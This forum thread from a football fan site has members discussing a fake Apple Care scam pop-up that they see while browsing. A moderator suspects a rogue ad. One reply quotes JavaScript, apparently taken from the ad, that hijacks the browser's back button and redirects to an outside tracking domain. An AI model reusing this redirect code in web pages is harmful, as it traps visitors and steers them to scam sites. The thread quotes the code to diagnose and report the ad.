Got something to say or just want fewer pesky ads? Join us... 😊

[Technology] Computer Error Message when on NSC

Change at Barnham

Aug 6, 2011
Bognor Regis
Screen Shot 2018-07-24 at 09.18.41.png

Over the last couple of weeks I have suddenly had the above message pop-up on my MacBook.
It only appears when I'm looking at NSC. At first I thought it was just random but I'm now wondering if there is a link somehow to NSC. As I spend more time on NSC than any other website it's probably just coincidence.
I have no Apple Care Plan so I assume it is just some kind of scam. The only action I have ever taken is to close the Safari web browser and begin again.

Have any other NSC users experienced the same message or have any idea how I can get rid of it randomly appearing?

:J)

Jul 7, 2003
Brighton
View attachment 99014

Over the last couple of weeks I have suddenly had the above message pop-up on my MacBook.
It only appears when I'm looking at NSC. At first I thought it was just random but I'm now wondering if there is a link somehow to NSC. As I spend more time on NSC than any other website it's probably just coincidence.
I have no Apple Care Plan so I assume it is just some kind of scam. The only action I have ever taken is to close the Safari web browser and begin again.

Have any other NSC users experienced the same message or have any idea how I can get rid of it randomly appearing?

Yes, I spotted it too a few days ago. I did the same as you, just closed the browser window and carried on regardless. I did however, do a scan of my laptop, but it didn't find anything dodgy. However - looking at NSC and this page in particular, makes the memory my Mac uses, go through the roof. Before posting this reply, I had to close the site, flush the cache and cookies, and re-open it. Seems to have calmed down a bit now...

BNthree

Plastic JCL
Sep 14, 2016
WeHo
Had a similar bogus message about updating Flash while browsing NSC, presumably from an ad. Mentioned it here but no response from [MENTION=6886]Bozza[/MENTION]

Bozza

You can change this
Helpful Moderator
Jul 4, 2003
Back in Sussex
It could be a rogue ad that's triggering this fake warning.

The problem with when this happens is, due to ad targeting, very few people may get the same. I use NSC a lot, always on a Mac, and I've never seen it.

If you get it again and are able to view page source and try to inspect on-page elements to see if you can get any clues as to where it's coming from or the URL it's pulling through I'll get it checked out ASAP.

Change at Barnham

Aug 6, 2011
Bognor Regis
If you get it again and are able to view page source and try to inspect on-page elements to see if you can get any clues as to where it's coming from or the URL it's pulling through I'll get it checked out ASAP.

Can you explain that again as if you were talking to a complete idiot. Does it mean copy the web address at the top of the page?

The Oldman

I like the Hat
NSC Licker Extraordinaire
Jul 12, 2003
In the shadow of Seaford Head
Over past 3 weeks I have had this pop up as well, last time Sunday evening. I am using a MacBook Pro. I just close it down and run Malwarebytes and do a virus scan. Not found anything nasty

Bozza

You can change this
Helpful Moderator
Jul 4, 2003
Back in Sussex
Over past 3 weeks I have had this pop up as well, last time Sunday evening. I am using a MacBook Pro. I just close it down and run Malwarebytes and do a virus scan. Not found anything nasty

I suspect you won't find anything unless you click on the ad and follow prompts to install something-or-other.

We moved to a different ad partner on the 11th July, but I guess there's a certain pool of ad marketplaces that sit behind most ad-serving, so once you've been targeted for whatever reason, by this rogue ad, it may have "followed" you from one partner to another.

Beach Hut

Brighton Bhuna Boy
Jul 5, 2003
Living In a Box
I get that error when I go on Tristrams gender neutral instagram account

swd40

Mar 22, 2006
html content for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("http://4protrackbinom.info/click.php?lp=1&place=back")

for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
onpopstate = function (t) {
t.state && location.replace("http://4protrackbinom.info/click.php?lp=1&place=back")

ferring seagull

Dec 30, 2010
I have had this several times (windows 7) and just exited windows and immediately run a scan. It has to be a SCAM or some wideboys trying to sell something which you or I don't need !

Albion and Premier League latest from Sky Sports

Paying the bills

Latest Discussions

Paying the bills

Paying the bills

Paying the bills

Link Here